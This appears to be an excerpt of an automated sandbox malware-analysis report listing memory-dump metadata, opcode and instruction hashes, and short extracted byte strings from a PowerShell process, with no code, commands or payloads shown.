                                        • Instruction ID: cdbda1012ed726147c25fa3a7f0077956c5215f144013c77822096236e3cae73
                                        • Opcode Fuzzy Hash: e91714a35fbe92964304c44db120266fc12a60561182ca8b7ea6027937751893
                                        • Instruction Fuzzy Hash: 67216BB4A157448FEB60CF6AD48839AFBF6EB88310F28C42DD85D97205D77464808B51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2074949142.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_7970000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 25015f0a2f634b9cbae5567878eebfc7f754f5d19f6f82d9c31e18759158c7d3
                                        • Instruction ID: efae5012469d88f46fb9be5086ae534bf273c7d1255d04ab5868239851a41245

                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2ce6dcfe2c81e8ebc50ebb679ee861b3ec081e1a96c01691c963285c4b3d4398
                                        • Instruction ID: 81d1a3922e29bc2c83ca158170b080777976e1f04161d9e07c158692c80f1112
                                        • Opcode Fuzzy Hash: 2ce6dcfe2c81e8ebc50ebb679ee861b3ec081e1a96c01691c963285c4b3d4398
                                        • Instruction Fuzzy Hash: 4AE0C235344B144B8711A66EA81485FF7DBEFC56A0744843EE22AD7340DEA4ED068795
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1746cb4b1a29db8375e595637f46bfca8c1cf17bc20203dfc25f3c2ea8645b1d
                                        • Instruction ID: 874adca054bde520113570e5e1bc36abc277d08918b0a9adbae8430c0cb466c4
                                        • Opcode Fuzzy Hash: 1746cb4b1a29db8375e595637f46bfca8c1cf17bc20203dfc25f3c2ea8645b1d
                                        • Instruction Fuzzy Hash: E3D05EA630022A27265432AF18097BE91CF8AC94F478D0036AB06D7641ED60EC0113F1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                        • Instruction ID: 8dff4a6eb9bca82b2b341e9123914429946dfed08556952dffebd09781c61a50
                                        • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                        • Instruction Fuzzy Hash: BBE08631B1001497CB48959AD4504D9FBAADFCC220F04C07AD90BA7340DA32691586E1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d1e729b8918c38f172624e4be3beda33a26c6dabeaec1668f73b73734466a6f9
                                        • Instruction ID: a75820c18b2a728cd248657abacdb237f1cef17783debdf348bfc6aa5e40d60e
                                        • Opcode Fuzzy Hash: d1e729b8918c38f172624e4be3beda33a26c6dabeaec1668f73b73734466a6f9
                                        • Instruction Fuzzy Hash: 29D067319042098BCF08BBA5E85B4BDBB34FA18751F41816DDA0792191EF352A6ACAC5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b712c96d4390b67f3f39d36b3e0bdbe86f1788ec5a6327d860c88a520978163d
                                        • Instruction ID: 130c021e5006cfab1cf31d491d0fcf21777513357d7443aa568c4b1316291371
                                        • Opcode Fuzzy Hash: b712c96d4390b67f3f39d36b3e0bdbe86f1788ec5a6327d860c88a520978163d
                                        • Instruction Fuzzy Hash: B2D01234A042098BCB04EFA8D44A46DBFB5BB48300F008159EA0593340EA345811CFC0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f7e6e07fb3e204a2566a3dc5ac8263f58eca0089295bec0ec9ae17ce6f67efb6
                                        • Instruction ID: d8a160d9bdd34b2e75fb119b7ebe50de7510f8edad6667a09a34bca1e5aacbce
                                        • Opcode Fuzzy Hash: f7e6e07fb3e204a2566a3dc5ac8263f58eca0089295bec0ec9ae17ce6f67efb6
                                        • Instruction Fuzzy Hash: B9D09239B00218CFDB14CBA5E885A9CB372FF88325F108069E61997250C732A916CB40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3d3ae40b4a24bd90b222b84fc0a3a8a84cddc72edd9f7653926ac87d42f4d857
                                        • Instruction ID: 2150d43f0dfc5ce0a38ea84439017cdf041c445ab620e47874945e05f0d96f0e
                                        • Opcode Fuzzy Hash: 3d3ae40b4a24bd90b222b84fc0a3a8a84cddc72edd9f7653926ac87d42f4d857
                                        • Instruction Fuzzy Hash: D4D022323043C54FC30A8E80E8D02C13F209F2332871246CFD8A5AB4E3DB010A16CB20
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eb1dbb84c1ac607d20c8e16d9cafe18929217bf009fad5e449ebea558fd644ba
                                        • Instruction ID: b1b370769499d65d5e5188eca1cb862440d000da0de2f320f5ab2a44a9a79dfd
                                        • Opcode Fuzzy Hash: eb1dbb84c1ac607d20c8e16d9cafe18929217bf009fad5e449ebea558fd644ba
                                        • Instruction Fuzzy Hash: 7BC08C319283D097EF02823440482003E61AA8322C70980CD80C047042E939C54DC302
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 226bb3573da7fe34459e8551b77acf6e697affc746cd0f029cfb19dd66b2a431
                                        • Instruction ID: 6cc8a2367eedc24f936591cdc2d2735772ee96d10d03ba5e15cfe030a320b608
                                        • Opcode Fuzzy Hash: 226bb3573da7fe34459e8551b77acf6e697affc746cd0f029cfb19dd66b2a431
                                        • Instruction Fuzzy Hash: 7AB09231045709CFC609AF75E408814736DFA402193A00AA8E60E4A692CE36E881CA45
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2074949142.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_7970000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: fcq$`Q^q$`Q^q$tP^q$$^q$$^q$$^q$$^q$$^q
                                        • API String ID: 0-2306644927
                                        • Opcode ID: e12a8eac0894b9efbc87b73b6fcee59eaa0ab8ada0a17cd74976254a3a25d47b
                                        • Instruction ID: cea7825e499445aebe579b7b1472dc003659f80ab264e6adff1d46b475da7cfc
                                        • Opcode Fuzzy Hash: e12a8eac0894b9efbc87b73b6fcee59eaa0ab8ada0a17cd74976254a3a25d47b
                                        • Instruction Fuzzy Hash: 1E61A1B0A5020EDFDF28CE08C545BAAB7FABF85759F148455E8019F291C771DD84CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0oAp$0oAp$0oAp$`Q^q$$^q$$^q$$^q
                                        • API String ID: 0-1375766648
                                        • Opcode ID: bce8694cc337b8b2e7587094c1b06c6567cb6c37f83b28437b55044d748c5cad
                                        • Instruction ID: bee94aa8633cd711881429c015d9c60311b8788ff8dae57e2baae12959cdf992
                                        • Opcode Fuzzy Hash: bce8694cc337b8b2e7587094c1b06c6567cb6c37f83b28437b55044d748c5cad
                                        • Instruction Fuzzy Hash: 28E1F2307501118FDB289F3D859462E76D7AFC9B10B2448AED902CF3A5EE75ED828792
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: `_q$`_q$`_q$`_q
                                        • API String ID: 0-3297199963
                                        • Opcode ID: 3179d67d3ef5324ab0f6416952f07e01f165a4dbe6cee334705b443f4e11a4e3
                                        • Instruction ID: 2e62025b5eb2c874f39b808f00129e3c24e1cadeb285c5a9488462801adc3885
                                        • Opcode Fuzzy Hash: 3179d67d3ef5324ab0f6416952f07e01f165a4dbe6cee334705b443f4e11a4e3
                                        • Instruction Fuzzy Hash: 27B1A674E012099FDB54DFA9D990A9DFBF2FF88300F10862AE419AB355DB70A945CF90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: `_q$`_q$`_q$`_q
                                        • API String ID: 0-3297199963
                                        • Opcode ID: 6d15bae565dfa39918d5b908e190437bf4c59a11b2192b352d69b2f78a16a6be
                                        • Instruction ID: 137a57fac6321ec9d710085b635bb766c5312a9f9c0d1154a93e1e4d70a5fc5c
                                        • Opcode Fuzzy Hash: 6d15bae565dfa39918d5b908e190437bf4c59a11b2192b352d69b2f78a16a6be
                                        • Instruction Fuzzy Hash: B0B19474E012099FDB54DFA9D990A9DFBF2FF88300F10862AE419AB355DB70A945CF90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2074949142.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_7970000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'^q$4'^q$$^q$$^q
                                        • API String ID: 0-2049395529
                                        • Opcode ID: 014479e8a09a002ea0c2dc2aac9e022051ecd86e031c4ed6bb3d2517ed6dc605
                                        • Instruction ID: a375c86eeb0308f66b460bb67e40aa0511ca09cc4700eb3bc73f74e6877d0a1b
                                        • Opcode Fuzzy Hash: 014479e8a09a002ea0c2dc2aac9e022051ecd86e031c4ed6bb3d2517ed6dc605
                                        • Instruction Fuzzy Hash: 49012171B493654FC32B962C5824631BBE66FC3915F2908ABD045CF3A7CE658C8AC392
                                        Uniqueness

                                        Uniqueness Score: -1.00%